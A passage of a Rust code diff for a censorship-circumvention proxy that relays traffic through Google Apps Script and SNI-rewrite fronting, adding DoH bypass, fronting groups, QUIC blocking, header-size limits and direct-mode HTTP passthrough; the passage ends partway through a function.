video chunks should bypass the Apps Script relay. + // **Reverted in v1.7.6** — multiple users (#275 amirabbas117, #281 + // mrerf) reported total YouTube breakage after v1.7.4. Root cause + // is that googlevideo.com is served by Google's separate "EVA" + // edge IPs, not the regular GFE IPs that the user's `google_ip` + // typically points at. SNI-rewriting `googlevideo.com:443` to a + // GFE IP got TLS handshake / wrong-cert errors for those users. + // Pre-v1.7.4 behaviour (chunks via the Apps Script relay path — + // slow but reliable on every GFE IP) is restored. If we ever want + // direct googlevideo.com routing, it needs a separate config knob + // that lets users specify their EVA edge IP independently. // Google Video Transport CDN — YouTube video chunks, Chrome // auto-updates, Google Play Store downloads. The single biggest // gap vs the upstream Python port: without these in the list @@ -72,27 +84,100 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[ "blogger.com", ]; -/// YouTube-family suffixes. Extracted so `youtube_via_relay` config can -/// pull them out of the SNI-rewrite dispatch at runtime. -const YOUTUBE_SNI_SUFFIXES: &[&str] = &[ +/// YouTube hosts that should be routed through the Apps Script relay +/// when `youtube_via_relay` is enabled — the API + HTML surfaces where +/// Restricted Mode is actually enforced (via the SNI=www.google.com +/// edge looking at the request). Issue #102 / #275. +/// +/// Deliberately narrower than the YouTube section of +/// `SNI_REWRITE_SUFFIXES`: +/// - `youtube.com` / `youtu.be` / `youtube-nocookie.com`: HTML pages +/// and player frames. These trigger Restricted Mode if served via +/// the SNI rewrite, so when the flag is on we relay them. +/// - `youtubei.googleapis.com`: the YouTube data API the player +/// queries for video metadata + manifest. Restricted Mode also +/// gates video availability here. Without this entry, the JSON +/// RPC layer would still hit the SNI-rewrite tunnel via the +/// broader `googleapis.com` suffix — the user-visible symptom of +/// that miss is "youtube_via_relay flips on but Restricted Mode +/// stays sticky on some videos." +/// +/// **NOT** in this list (intentional, was a regression in #275): +/// - `ytimg.com`: thumbnails. No Restricted Mode logic on a static +/// image CDN; routing through Apps Script makes thumbnails slow +/// for zero gain. +/// - `googlevideo.com`: video chunk CDN. Routing through Apps Script +/// means every chunk eats Apps Script quota *and* risks the 6-min +/// execution cap aborting long videos mid-playback. +/// - `ggpht.com`: channel/profile images, same reasoning as ytimg. +const YOUTUBE_RELAY_HOSTS: &[&str] = &[ "youtube.com", "youtu.be", "youtube-nocookie.com", - "ytimg.com", + "youtubei.googleapis.com", +]; + +/// Built-in list of DNS-over-HTTPS endpoints. CONNECTs to these (when +/// `tunnel_doh` is left at the default of `false`, i.e. bypass enabled) +/// skip the Apps Script tunnel and exit via plain TCP. Mix of the +/// browser-pinned variants Chrome/Brave/Edge/Firefox/Safari use and the +/// well-known public DoH providers users wire up by hand. Suffix +/// matching means we don't need to enumerate every tenant subdomain +/// (e.g. `*.cloudflare-dns.com` covers Workers-hosted DoH too). +/// +/// Entries are matched case-insensitively. Both exact-match (`dns.google`) +/// and dot-anchored suffix-match (a host whose suffix is `.cloudflare-dns.com` +/// or which equals `cloudflare-dns.com`) are accepted — same shape as +/// `passthrough_hosts`'s `.foo` rule. +const DEFAULT_DOH_HOSTS: &[&str] = &[ + // The base SLD covers every tenant subdomain via suffix matching; + // the browser-pinned variants below are listed for grep/discovery + // (so a user searching "chrome.cloudflare-dns.com" finds this list) + // and are technically redundant under cloudflare-dns.com. + "cloudflare-dns.com", + "chrome.cloudflare-dns.com", + "mozilla.cloudflare-dns.com", + "1dot1dot1dot1.cloudflare-dns.com", + "dns.google", + "dns.google.com", + "dns.quad9.net", + "dns11.quad9.net", + "dns.adguard-dns.com", + "unfiltered.adguard-dns.com", + "family.adguard-dns.com", + "dns.nextdns.io", + "doh.opendns.com", + "doh.cleanbrowsing.org", + "doh.dns.sb", + "dns0.eu", + "dns.alidns.com", + "doh.pub", + "dns.mullvad.net", ]; fn matches_sni_rewrite(host: &str, youtube_via_relay: bool) -> bool { let h = host.to_ascii_lowercase(); let h = h.trim_end_matches('.'); + + // YouTube relay carve-out runs FIRST so it wins over the broad + // `googleapis.com` suffix that would otherwise pull + // `youtubei.googleapis.com` into the SNI-rewrite path. The earlier + // implementation iterated SNI_REWRITE_SUFFIXES with a filter, which + // works for sibling entries (e.g. `youtube.com` in both lists) but + // not for nested ones (`youtubei.googleapis.com` matches the broad + // `googleapis.com` even when its specific entry is filtered out). + // The short-circuit here is unconditional — we don't need to check + // SNI rewrite once we've decided this host goes to the relay. + if youtube_via_relay { + for s in YOUTUBE_RELAY_HOSTS { + if h == *s || h.ends_with(&format!(".{}", s)) { + return false; + } + } + } + SNI_REWRITE_SUFFIXES .iter() - .filter(|s| { - // If the user opted into youtube_via_relay, skip YouTube - // suffixes so they fall through to the Apps Script relay - // path. See config.rs `youtube_via_relay` docs for the - // trade-off. Issue #102. - !(youtube_via_relay && YOUTUBE_SNI_SUFFIXES.contains(s)) - }) .any(|s| h == *s || h.ends_with(&format!(".{}", s))) } @@ -125,12 +210,15 @@ pub struct ProxyServer { host: String, port: u16, socks5_port: u16, - /// `None` in `google_only` (bootstrap) mode: no Apps Script relay is - /// wired up, only the SNI-rewrite tunnel path is live. + /// `None` in `direct` mode: no Apps Script relay is wired up, + /// only the SNI-rewrite tunnel path (Google edge + any configured + /// `fronting_groups`) is live. fronter: Option>, mitm: Arc>, rewrite_ctx: Arc, tunnel_mux: Option>, + coalesce_step_ms: u64, + coalesce_max_ms: u64, } pub struct RewriteCtx { @@ -148,6 +236,142 @@ pub struct RewriteCtx { /// and pass through as plain TCP (optionally via upstream_socks5). /// See config.rs `passthrough_hosts` for matching rules. Issues #39, #127. pub passthrough_hosts: Vec, + /// If true, drop SOCKS5 UDP datagrams destined for port 443 so + /// callers fall back to TCP/HTTPS. See config.rs `block_quic` for + /// the trade-off. Issue #213. + pub block_quic: bool, + /// If true, route DoH CONNECTs around the Apps Script tunnel via + /// plain TCP. Default false via `Config::tunnel_doh = true` (flipped + /// in v1.9.0, issue #468). See `DEFAULT_DOH_HOSTS` and + /// `matches_doh_host` for matching, and config.rs `tunnel_doh` for + /// the trade-off. + pub bypass_doh: bool, + /// User-supplied DoH hostnames added to the built-in default list. + /// Same matching semantics as `passthrough_hosts`. + pub bypass_doh_hosts: Vec, + /// Multi-edge fronting groups, resolved at startup. Each group's + /// `ServerName` is parsed once so the per-connection dial path + /// is allocation-free. Wrapped in `Arc` so a per-CONNECT match + /// can hand the dispatcher a refcount-clone instead of cloning + /// the whole struct (which holds a `Vec` of normalized + /// domains used only for matching). Empty = feature off (only + /// the built-in Google edge SNI-rewrite is active). + pub fronting_groups: Vec>, +} + +/// True if `host` matches a known DoH endpoint — either the built-in +/// `DEFAULT_DOH_HOSTS` list or a user-supplied entry in `extra`. Match +/// is case-insensitive, and entries match either exactly OR as a +/// dot-anchored suffix unconditionally (no leading-dot requirement, +/// unlike `passthrough_hosts`). The DoH list is *always* about a +/// service — every legitimate tenant subdomain of `cloudflare-dns.com` +/// or a user's private `doh.acme.test` is a DoH endpoint, so requiring +/// users to remember to write `.doh.acme.test` would be a footgun +/// without an obvious benefit. +fn host_matches_doh_entry(h: &str, entry: &str) -> bool { + let e = entry.trim().trim_end_matches('.').to_ascii_lowercase(); + let e = e.strip_prefix('.').unwrap_or(&e); + if e.is_empty() { + return false; + } + h == e || h.ends_with(&format!(".{}", e)) +} + +pub fn matches_doh_host(host: &str, extra: &[String]) -> bool { + let h = host.to_ascii_lowercase(); + let h = h.trim_end_matches('.'); + if h.is_empty() { + return false; + } + if DEFAULT_DOH_HOSTS + .iter() + .any(|s| host_matches_doh_entry(h, s)) + { + return true; + } + extra.iter().any(|s| host_matches_doh_entry(h, s)) +} + +/// A `FrontingGroup` after one-time validation: the group's `sni` is +/// parsed into a `ServerName` so we don't repay that on every dialed +/// connection, and domain entries are pre-lower-cased + dot-trimmed +/// so the per-request match path is just byte comparisons. +#[derive(Debug, Clone)] +pub struct FrontingGroupResolved { + pub name: String, + pub ip: String, + pub sni: String, + pub server_name: ServerName<'static>, + domains_normalized: Vec, +} + +impl FrontingGroupResolved { + fn from_config(g: &FrontingGroup) -> Result { + let server_name = ServerName::try_from(g.sni.clone()) + .map_err(|e| format!("invalid sni '{}': {}", g.sni, e))?; + let domains_normalized = g + .domains + .iter() + .map(|d| d.trim().trim_end_matches('.').to_ascii_lowercase()) + .filter(|d| !d.is_empty()) + .collect(); + Ok(Self { + name: g.name.clone(), + ip: g.ip.clone(), + sni: g.sni.clone(), + server_name, + domains_normalized, + }) + } +} + +/// First fronting group whose domain list contains `host`, if any. +/// Match is case-insensitive and unconditionally suffix-anchored: an +/// entry `vercel.com` matches both `vercel.com` and `*.vercel.com`. +/// This is the right shape for fronting because every legitimate +/// subdomain of a fronted domain is itself fronted by the same edge +/// — requiring users to spell out every subdomain would be a footgun. +/// Same matching shape as the DoH host list. First match wins, so +/// users can put more-specific groups earlier when entries would +/// otherwise overlap. +pub fn match_fronting_group<'a>( + host: &str, + groups: &'a [Arc], +) -> Option<&'a Arc> { + if groups.is_empty() { + return None; + } + let h = host.to_ascii_lowercase(); + let h = h.trim_end_matches('.'); + if h.is_empty() { + return None; + } + for g in groups { + for d in &g.domains_normalized { + if is_dot_anchored_match(h, d) { + return Some(g); + } + } + } + None +} + +/// True if `host` equals `entry` exactly OR is a strict dot-anchored +/// suffix of it (i.e. `entry == "vercel.com"` matches `host == +/// "app.vercel.com"` but not `host == "xvercel.com"`). Both inputs +/// must already be lowercase + trailing-dot trimmed; the function +/// does no allocation, unlike the obvious `format!(".{}", entry)` +/// implementation that allocates per call. +#[inline] +fn is_dot_anchored_match(host: &str, entry: &str) -> bool { + if host == entry { + return true; + } + let hb = host.as_bytes(); + let eb = entry.as_bytes(); + hb.len() > eb.len() + && hb.ends_with(eb) + && hb[hb.len() - eb.len() - 1] == b'.' } /// True if `host` matches any entry in the user's passthrough list. @@ -181,16 +405,16 @@ impl ProxyServer { .mode_kind() .map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidInput, format!("{e}")))?; - // `google_only` mode skips the Apps Script relay entirely, so we must + // `direct` mode skips the Apps Script relay entirely, so we must // not try to construct the DomainFronter — it errors on a missing - // `script_id`, which is exactly the state a bootstrapping user is in. + // `script_id`, which is exactly the state a direct-mode user is in. let fronter = match mode { Mode::AppsScript | Mode::Full => { let f = DomainFronter::new(config) .map_err(|e| std::io::Error::new(std::io::ErrorKind::Other, format!("{e}")))?; Some(Arc::new(f)) } - Mode::GoogleOnly => None, + Mode::Direct => None, }; let tls_config = if config.verify_ssl { @@ -207,6 +431,68 @@ impl ProxyServer { }; let tls_connector = TlsConnector::from(Arc::new(tls_config)); + // Surface a config combo that is otherwise silently inert: extras + // listed under `bypass_doh_hosts` only take effect when the bypass + // itself is on. A user who set `tunnel_doh: true` *and* populated + // the extras list almost certainly didn't mean to disable the + // feature their custom hosts feed into. + if config.tunnel_doh && !config.bypass_doh_hosts.is_empty() { + tracing::warn!( + "config: bypass_doh_hosts has {} entries but tunnel_doh=true — \ + the bypass is off, so the extras have no effect. Set \ + tunnel_doh=false (or omit it) to use them.", + config.bypass_doh_hosts.len() + ); + } + + // Same-shape warning for fronting_groups in full mode. The dispatch + // short-circuits to the tunnel mux before the fronting_groups check + // (full mode preserves end-to-end TLS, fronting_groups requires + // MITM), so groups configured here will never fire. Surface this + // at startup rather than letting users wonder why their Vercel + // domains never hit the configured edge. + if mode == Mode::Full && !config.fronting_groups.is_empty() { + tracing::warn!( + "config: fronting_groups has {} entries but mode=full — \ + full mode tunnels everything end-to-end through Apps Script \ + (no MITM), so groups never fire. Switch to mode=apps_script \ + or mode=direct to use them, or remove the groups to silence \ + this warning.", + config.fronting_groups.len() + ); + } + + let mut fronting_groups: Vec> = + Vec::with_capacity(config.fronting_groups.len()); + let mut seen_names: std::collections::HashSet = Default::default(); + for g in &config.fronting_groups { + let resolved = FrontingGroupResolved::from_config(g).map_err(|e| { + std::io::Error::new( + std::io::ErrorKind::InvalidInput, + format!("fronting_groups['{}']: {}", g.name, e), + ) + })?; + // Surface duplicate group names at startup. Not a hard + // error — copy-pasted configs can land here legitimately + // — but log lines key on `name` and dedup ambiguity makes + // them unreadable. + if !seen_names.insert(resolved.name.clone()) { + tracing::warn!( + "fronting group name '{}' is used by more than one group; \ + log lines that reference the name will be ambiguous", + resolved.name + ); + } + tracing::info!( + "fronting group '{}': sni={} ip={} domains={}", + resolved.name, + resolved.sni, + resolved.ip, + resolved.domains_normalized.len() + ); + fronting_groups.push(Arc::new(resolved)); + } + let rewrite_ctx = Arc::new(RewriteCtx { google_ip: config.google_ip.clone(), front_domain: config.front_domain.clone(), @@ -216,6 +502,10 @@ impl ProxyServer { mode, youtube_via_relay: config.youtube_via_relay, passthrough_hosts: config.passthrough_hosts.clone(), + block_quic: config.block_quic, + bypass_doh: !config.tunnel_doh, + bypass_doh_hosts: config.bypass_doh_hosts.clone(), + fronting_groups, }); let socks5_port = config.socks5_port.unwrap_or(config.listen_port + 1); @@ -228,6 +518,8 @@ impl ProxyServer { mitm, rewrite_ctx, tunnel_mux: None, // initialized in run() inside the tokio runtime + coalesce_step_ms: if config.coalesce_step_ms > 0 { config.coalesce_step_ms as u64 } else { 40 }, + coalesce_max_ms: if config.coalesce_max_ms > 0 { config.coalesce_max_ms as u64 } else { 1000 }, }) } @@ -241,7 +533,7 @@ impl ProxyServer { // Initialize TunnelMux inside the runtime (tokio::spawn requires it). if self.rewrite_ctx.mode == Mode::Full { if let Some(f) = self.fronter.as_ref() { - self.tunnel_mux = Some(TunnelMux::start(f.clone())); + self.tunnel_mux = Some(TunnelMux::start(f.clone(), self.coalesce_step_ms, self.coalesce_max_ms)); } } @@ -259,14 +551,44 @@ impl ProxyServer { ); // Pre-warm the outbound connection pool so the user's first request // doesn't pay a fresh TLS handshake to Google edge. Best-effort; - // failures are logged and ignored. Skipped in `google_only` — there - // is no fronter to warm. + // failures are logged and ignored. Skipped in `direct` mode — + // there is no fronter to warm. + // + // Sized to roughly match a browser's parallel-connection burst at + // startup. The previous fixed `3` was fine for a single deployment + // but left requests 4-10 of the opening burst paying a cold TLS + // handshake each (~300ms). Scaling with deployment count gives + // multi-account configs a proportionally warmer pool, capped so + // single-deployment users don't hammer Google edge unnecessarily. if let Some(warm_fronter) = self.fronter.clone() { + let n = warm_fronter.num_scripts().clamp(6, 16); tokio::spawn(async move { - warm_fronter.warm(3).await; + warm_fronter.warm(n).await; }); } + // Apps Script container keepalive. `warm()` above keeps the TCP + // pool warm at startup, but the V8 container behind UrlFetchApp + // goes cold after ~5min idle and costs 1-3s to wake. A periodic + // HEAD ping prevents the cold-start lag on the first request + // after a quiet pause (most visible as YouTube player stalls). + // Skipped in direct mode for the same reason as warm — + // there's no fronter to ping. + // + // The handle is captured (not fire-and-forget) so the shutdown + // arm of the select! below can abort it. Without that, hitting + // Stop in the UI would leave the keepalive holding an + // Arc on stale config and pinging Apps Script + // every 240s — same class of bug that issue #99 hit for the + // accept loops. + let keepalive_task = if let Some(keepalive_fronter) = self.fronter.clone() { + tokio::spawn(async move { + keepalive_fronter.run_h1_keepalive().await; + }) + } else { + tokio::spawn(async move { std::future::pending::<()>().await }) + }; + let stats_task = if let Some(stats_fronter) = self.fronter.clone() { tokio::spawn(async move { let mut ticker = tokio::time::interval(std::time::Duration::from_secs(60)); @@ -374,6 +696,7 @@ impl ProxyServer { _ = &mut shutdown_rx => { tracing::info!("Shutdown signal received, stopping listeners"); stats_task.abort(); + keepalive_task.abort(); http_task.abort(); socks_task.abort(); } @@ -447,8 +770,26 @@ async fn handle_http_client( tunnel_mux: Option>, ) -> std::io::Result<()> { let (head, leftover) = match read_http_head(&mut sock).await? { - Some(v) => v, - None => return Ok(()), + HeadReadResult::Got { head, leftover } => (head, leftover), + HeadReadResult::Closed => return Ok(()), + HeadReadResult::Oversized => { + // Reply with 431 instead of just dropping the socket so the + // browser shows a real error rather than retrying the same + // oversized request in a loop. + tracing::warn!( + "request head exceeds {} bytes — refusing with 431", + MAX_HEADER_BYTES + ); + let _ = sock + .write_all( + b"HTTP/1.1 431 Request Header Fields Too Large\r\n\ + Connection: close\r\n\ + Content-Length: 0\r\n\r\n", + ) + .await; + let _ = sock.flush().await; + return Ok(()); + } }; let (method, target, _version, _headers) = parse_request_head(&head) @@ -456,30 +797,41 @@ async fn handle_http_client( if method.eq_ignore_ascii_case("CONNECT") { let (host, port) = parse_host_port(&target); + // Mirror the SOCKS5 short-circuit: if the tunnel-node just failed + // this (host, port) with unreachable, return 502 immediately rather + // than acknowledging the CONNECT and blowing tunnel quota on a + // guaranteed retry. See `TunnelMux::is_unreachable` for context. + if let Some(ref mux) = tunnel_mux { + if mux.is_unreachable(&host, port) { + tracing::info!("CONNECT {}:{} (negative-cached, refusing)", host, port); + let _ = sock + .write_all(b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\nConnection: close\r\n\r\n") + .await; + let _ = sock.flush().await; + return Ok(()); + } + } sock.write_all(b"HTTP/1.1 200 Connection Established\r\n\r\n") .await?; sock.flush().await?; dispatch_tunnel(sock, host, port, fronter, mitm, rewrite_ctx, tunnel_mux).await } else { - // Plain HTTP proxy request (e.g. `GET http://…`). The Apps Script - // relay is the only code path that can fulfil this, so in google_only - // bootstrap mode we return a clear 502 instead. + // Plain HTTP proxy request (e.g. `GET http://…`). + // + // apps_script mode: relay through the Apps Script fronter (which + // is the whole point of the relay). + // + // direct mode: no fronter exists, so passthrough as raw TCP. + // Same contract as `dispatch_tunnel` honors for CONNECT in + // direct mode — anything not on the Google edge / not in a + // configured fronting_group is forwarded direct (or via + // `upstream_socks5`) so the user's browser still works while + // they finish setting up Apps Script. Issue: typing a bare + // `http://example.com` URL used to return a 502 here even + // though `https://example.com` (CONNECT) worked fine. match fronter { Some(f) => do_plain_http(sock, &head, &leftover, f).await, - None => { - let _ = sock - .write_all( - b"HTTP/1.1 502 Bad Gateway\r\n\ - Content-Type: text/plain; charset=utf-8\r\n\ - Content-Length: 120\r\n\ - Connection: close\r\n\r\n\ - google_only mode: plain HTTP proxy requests are not supported. \ - Browse https over CONNECT, or switch to apps_script mode.", - ) - .await; - let _ = sock.flush().await; - Ok(()) - } + None => do_plain_http_passthrough(sock, &head, &leftover, &rewrite_ctx).await, } } } @@ -557,6 +909,21 @@ async fn handle_socks5_client( return handle_socks5_udp_associate(sock, rewrite_ctx, tunnel_mux).await; } + // Negative-cache short-circuit: if the tunnel-node just failed to reach + // this exact (host, port) with `Network is unreachable` / `No route to + // host`, reply 0x04 (Host unreachable) immediately. Saves a 1.5–2s tunnel + // round-trip on guaranteed-failing targets — the IPv6 probe retry loop + // is the main offender on devices without IPv6. + if let Some(ref mux) = tunnel_mux { + if mux.is_unreachable(&host, port) { + tracing::info!("SOCKS5 CONNECT -> {}:{} (negative-cached, refusing)", host, port); + sock.write_all(&[0x05, 0x04, 0x00, 0x01, 0, 0, 0, 0, 0, 0]) + .await?; + sock.flush().await?; + return Ok(()); + } + } + tracing::info!("SOCKS5 CONNECT -> {}:{}", host, port); // Success reply with zeroed BND. @@ -784,6 +1151,30 @@ async fn handle_socks5_udp_associate( continue; }; + // Issue #213: client-side QUIC block. UDP/443 is + // HTTP/3 — drop the datagram silently so the client + // stack retries a couple of times and then falls back + // to TCP/HTTPS, which goes through the regular CONNECT + // path. Skipping this at the SOCKS5 layer (rather than + // letting it hit the tunnel-node) avoids paying the + // 200–500 ms tunnel-node round-trip per dropped QUIC + // datagram, which would otherwise compound during the + // 1–3 retries before the browser falls back. + // + // Silent drop instead of an explicit error reply: the + // SOCKS5 UDP wire has no "destination unreachable" + // datagram — `0x04` only exists in TCP CONNECT replies + // (RFC 1928 §6). The browser's QUIC stack already has + // a "no response → fall back" timeout, so silent drop + // is the contractually correct shape. + if rewrite_ctx.block_quic && target.port == 443 { + tracing::debug!( + "udp dropped: block_quic=true, target {}:443", + target.host + ); + continue; + } + // RFC 1928 §6: lock to the first VALID datagram's source // port. Subsequent datagrams must come from the same // (ip, port) pair. @@ -1190,6 +1581,28 @@ async fn dispatch_tunnel( return Ok(()); } + // 0.5. DoH bypass. DNS-over-HTTPS is the dominant per-flow DNS cost + // in Full mode (every browser name lookup costs a ~2 s Apps + // Script round-trip), and the tunnel adds no privacy beyond + // what DoH already provides. Route known DoH hosts directly. + // Port-gated to 443 so a non-TLS CONNECT to e.g. `dns.google:80` + // doesn't get diverted off-tunnel by accident. + // See `DEFAULT_DOH_HOSTS` and config.rs `tunnel_doh`. + if rewrite_ctx.bypass_doh + && port == 443 + && matches_doh_host(&host, &rewrite_ctx.bypass_doh_hosts) + { + let via = rewrite_ctx.upstream_socks5.as_deref(); + tracing::info!( + "dispatch {}:{} -> raw-tcp ({}) (doh bypass)", + host, + port, + via.unwrap_or("direct") + ); + plain_tcp_passthrough(sock, &host, port, via).await; + return Ok(()); + } + // 1. Full tunnel mode: ALL traffic goes through the batch multiplexer // (Apps Script → tunnel node → real TCP). No MITM, no cert. if rewrite_ctx.mode == Mode::Full { @@ -1209,6 +1622,40 @@ async fn dispatch_tunnel( return Ok(()); } + // 2a. User-configured fronting groups (Vercel, Fastly, etc.). Wins + // over the built-in Google SNI-rewrite suffix list — if a user + // adds e.g. `vercel.com` to a Vercel fronting group, we hit + // Vercel's edge with sni=react.dev rather than trying to resolve + // it through Google's. Port-gated to 443: SNI-rewrite needs a + // real ClientHello and a non-TLS CONNECT to the same hostname + // would just hang. Only HTTPS sites are fronted by these CDNs in + // practice, so the gate has no false negatives we care about. + if port == 443 { + // `Arc::clone` here is refcount-only; we hold it across the + // await below without keeping `rewrite_ctx` borrowed. + let group_match = + match_fronting_group(&host, &rewrite_ctx.fronting_groups).map(Arc::clone); + if let Some(group) = group_match { + tracing::info!( + "dispatch {}:{} -> sni-rewrite tunnel (fronting group '{}', edge {} sni={})", + host, + port, + group.name, + group.ip, + group.sni + ); + return do_sni_rewrite_tunnel_from_tcp( + sock, + &host, + port, + mitm, + rewrite_ctx, + Some(group), + ) + .await; + } + } + // 2. Explicit hosts override or SNI-rewrite suffix: for HTTPS targets, // use the TLS SNI-rewrite tunnel (skipped in full mode above). if should_use_sni_rewrite( @@ -1222,17 +1669,18 @@ async fn dispatch_tunnel( host, port ); - return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx).await; + return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx, None).await; } - // 3. google_only bootstrap: no Apps Script relay exists. Anything that - // isn't SNI-rewrite-matched gets direct TCP passthrough so the user's - // browser still works while they're deploying Code.gs. They'd switch - // to apps_script mode for the real DPI bypass. - if rewrite_ctx.mode == Mode::GoogleOnly { + // 3. direct mode: no Apps Script relay exists. Anything that isn't + // SNI-rewrite-matched (Google edge or a configured fronting_group) + // gets raw TCP passthrough so the user's browser still works while + // they're deploying Code.gs. They'd switch to apps_script mode for + // full DPI bypass. + if rewrite_ctx.mode == Mode::Direct { let via = rewrite_ctx.upstream_socks5.as_deref(); tracing::info!( - "dispatch {}:{} -> raw-tcp ({}) (google_only: no relay)", + "dispatch {}:{} -> raw-tcp ({}) (direct mode: no relay)", host, port, via.unwrap_or("direct") @@ -1499,14 +1947,35 @@ fn looks_like_http(first_bytes: &[u8]) -> bool { /// Read an HTTP head (request line + headers) up to the first \r\n\r\n. /// Returns (head_bytes, leftover_after_head). The leftover may contain part /// of the request body already received. -async fn read_http_head(sock: &mut TcpStream) -> std::io::Result, Vec)>> { +/// Maximum size of an HTTP request head (request line + all headers). +/// +/// Set to match upstream Python's `MAX_HEADER_BYTES` (64 KB, +/// masterking32/MasterHttpRelayVPN constants.py). Real browsers +/// virtually never exceed ~16 KB; anything past 64 KB is either a +/// buggy client or a deliberate slowloris-style header bomb. +/// Previously 1 MB, which let a misbehaving client allocate a lot +/// of memory before failing. +const MAX_HEADER_BYTES: usize = 64 * 1024; + +/// Result of `read_http_head` / `read_http_head_io`. +/// `Oversized` is distinct from other I/O errors so the caller can +/// reply with `431 Request Header Fields Too Large` instead of just +/// dropping the connection (which a browser would silently retry, +/// reproducing the same problem). +enum HeadReadResult { + Got { head: Vec, leftover: Vec }, + Closed, + Oversized, +} + +async fn read_http_head(sock: &mut TcpStream) -> std::io::Result { let mut buf = Vec::with_capacity(4096); let mut tmp = [0u8; 4096]; loop { let n = sock.read(&mut tmp).await?; if n == 0 { return if buf.is_empty() { - Ok(None) + Ok(HeadReadResult::Closed) } else { Err(std::io::Error::new( std::io::ErrorKind::UnexpectedEof, @@ -1518,13 +1987,10 @@ async fn read_http_head(sock: &mut TcpStream) -> std::io::Result if let Some(pos) = find_headers_end(&buf) { let head = buf[..pos].to_vec(); let leftover = buf[pos..].to_vec(); - return Ok(Some((head, leftover))); + return Ok(HeadReadResult::Got { head, leftover }); } - if buf.len() > 1024 * 1024 { - return Err(std::io::Error::new( - std::io::ErrorKind::InvalidData, - "headers too large", - )); + if buf.len() > MAX_HEADER_BYTES { + return Ok(HeadReadResult::Oversized); } } } @@ -1680,17 +2146,37 @@ async fn do_sni_rewrite_tunnel_from_tcp( port: u16, mitm: Arc>, rewrite_ctx: Arc, + // When Some, overrides the default Google edge target with a + // user-configured fronting group's (ip, sni). `Arc` so the + // dispatcher hands us a refcount-only clone — the resolved + // group also carries the matcher's normalized domain list which + // we don't need here. None = built-in Google edge path. + group: Option>, ) -> std::io::Result<()> { - let target_ip = hosts_override(&rewrite_ctx.hosts, host) - .map(|s| s.to_string()) - .unwrap_or_else(|| rewrite_ctx.google_ip.clone()); + let (target_ip, outbound_sni, server_name) = match &group { + Some(g) => (g.ip.clone(), g.sni.clone(), g.server_name.clone()), + None => { + let ip = hosts_override(&rewrite_ctx.hosts, host) + .map(|s| s.to_string()) + .unwrap_or_else(|| rewrite_ctx.google_ip.clone()); + let sni = rewrite_ctx.front_domain.clone(); + let sn = match ServerName::try_from(sni.clone()) { + Ok(n) => n, + Err(e) => { + tracing::error!("invalid front_domain '{}': {}", sni, e); + return Ok(()); + } + }; + (ip, sni, sn) + } + }; tracing::info!( "SNI-rewrite tunnel -> {}:{} via {} (outbound SNI={})", host, port, target_ip, - rewrite_ctx.front_domain + outbound_sni ); // Accept browser TLS with a cert we sign for `host`. @@ -1734,13 +2220,6 @@ async fn do_sni_rewrite_tunnel_from_tcp( }; let _ = upstream_tcp.set_nodelay(true); - let server_name = match ServerName::try_from(rewrite_ctx.front_domain.clone()) { - Ok(n) => n, - Err(e) => { - tracing::error!("invalid front_domain '{}': {}", rewrite_ctx.front_domain, e); - return Ok(()); - } - }; let outbound = match rewrite_ctx .tls_connector .connect(server_name, upstream_tcp) @@ -1833,8 +2312,31 @@ where S: tokio::io::AsyncRead + tokio::io::AsyncWrite + Unpin, { let (head, leftover) = match read_http_head_io(stream).await? { - Some(v) => v, - None => return Ok(false), + HeadReadResult::Got { head, leftover } => (head, leftover), + HeadReadResult::Closed => return Ok(false), + HeadReadResult::Oversized => { + // Inside MITM: same reasoning as the plaintext path. Return + // 431 over the decrypted stream so the browser surfaces a + // real error to the user instead of looping a connection + // reset, which was the symptom upstream caught (Apps Script + // ate malformed JSON when truncated header blocks were + // forwarded blindly). + tracing::warn!( + "MITM header block exceeds {} bytes — closing ({}:{})", + MAX_HEADER_BYTES, + host, + port + ); + let _ = stream + .write_all( + b"HTTP/1.1 431 Request Header Fields Too Large\r\n\ + Connection: close\r\n\ + Content-Length: 0\r\n\r\n", + ) + .await; + let _ = stream.flush().await; + return Ok(false); + } }; let (method, path, _version, headers) = match parse_request_head(&head) { @@ -1862,7 +2364,7 @@ where // pourya-p's log in #64 showed the real Host header. Match every // subdomain of x.com here. let host_lower = host.to_ascii_lowercase(); - let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com"); + let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com") || host_lower == "twitter.com" || host_lower.ends_with(".twitter.com"); let path = if is_x_com && path.starts_with("/i/api/graphql/") && path.contains("?variables=") { match path.split_once('&') { Some((short, _)) => { @@ -1955,7 +2457,7 @@ where Ok(!connection_close) } -async fn read_http_head_io(stream: &mut S) -> std::io::Result, Vec)>> +async fn read_http_head_io(stream: &mut S) -> std::io::Result where S: tokio::io::AsyncRead + Unpin, { @@ -1965,7 +2467,7 @@ where let n = stream.read(&mut tmp).await?; if n == 0 { return if buf.is_empty() { - Ok(None) + Ok(HeadReadResult::Closed) } else { Err(std::io::Error::new( std::io::ErrorKind::UnexpectedEof, @@ -1977,13 +2479,10 @@ where if let Some(pos) = find_headers_end(&buf) { let head = buf[..pos].to_vec(); let leftover = buf[pos..].to_vec(); - return Ok(Some((head, leftover))); + return Ok(HeadReadResult::Got { head, leftover }); } - if buf.len() > 1024 * 1024 { - return Err(std::io::Error::new( - std::io::ErrorKind::InvalidData, - "headers too large", - )); + if buf.len() > MAX_HEADER_BYTES { + return Ok(HeadReadResult::Oversized); } } } @@ -2203,6 +2702,174 @@ async fn do_plain_http( Ok(()) } +/// `direct` mode plain-HTTP passthrough. The CONNECT path already +/// falls through to raw TCP for hosts outside the SNI-rewrite set in +/// `direct`; this is the same idea for the `GET http://…` proxy form +/// so a bare `http://example.com` typed in the address bar doesn't 502. +/// +/// We rewrite the absolute-form request URI (`GET http://host/path`) to +/// origin form (`GET /path`), strip hop-by-hop headers, force +/// `Connection: close` so a keep-alive client can't pipeline a request +/// to a different host onto our spliced socket, then dial the origin +/// (honoring `upstream_socks5` if set) and splice both directions. +async fn do_plain_http_passthrough( + mut sock: TcpStream, + head: &[u8], + leftover: &[u8], + rewrite_ctx: &RewriteCtx, +) -> std::io::Result<()> { + let (method, target, version, headers) = match parse_request_head(head) { + Some(v) => v, + None => return Ok(()), + }; + + let (host, port, path) = match resolve_plain_http_target(&target, &headers) { + Some(v) => v, + None => { + tracing::debug!("plain-http passthrough: cannot parse target {}", target); + return Ok(()); 